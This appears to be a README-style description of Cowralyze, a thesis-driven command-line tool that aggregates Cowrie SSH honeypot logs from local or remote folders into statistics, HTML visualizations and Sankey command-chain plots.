Cowralyze
A compliant audit log tool that provides a searchable, exportable record of read/write events.
This project focuses on a Command Line Map-Reduce tool
This project focuses on a Command Line Map-Reduce tool designed to analyze Cowrie log files stored on remote servers or local folders over time. It also creates visualizations and statistics based on the data.
The Tool Utilizes Multiple Log Files for Enhanced Data Analysis
The tool uses multiple log files formatted as to generate a cumulative information file and visualizations from either a local or remote folder path. This process ultimately produces statistics regarding all event changes over time. You can run the command: python3 cowralyze.py --help to see the available commands along with a description for each one. Additionally, there is an option to trace commands by session ID or IP address, as well as to create Sankey Command Chain Plots for specific log files.
Motivation: This project was developed as part of my Bachelor's Thesis: Longitudinal Analysis of SSH Honeypots. While many tools related to honeypots exist, they typically concentrate on high-level aggregated statistics rather than focusing on individual log anomalies.
The Objective of This Project
The objective of this project is to provide a tool that offers a quick overview of the changes over time for possibly hundreds of cowrie honeypots.
The Statistics Overview
HTML provides the accumulated percentage changes over time, while result.html offers a visualization across the dataset.
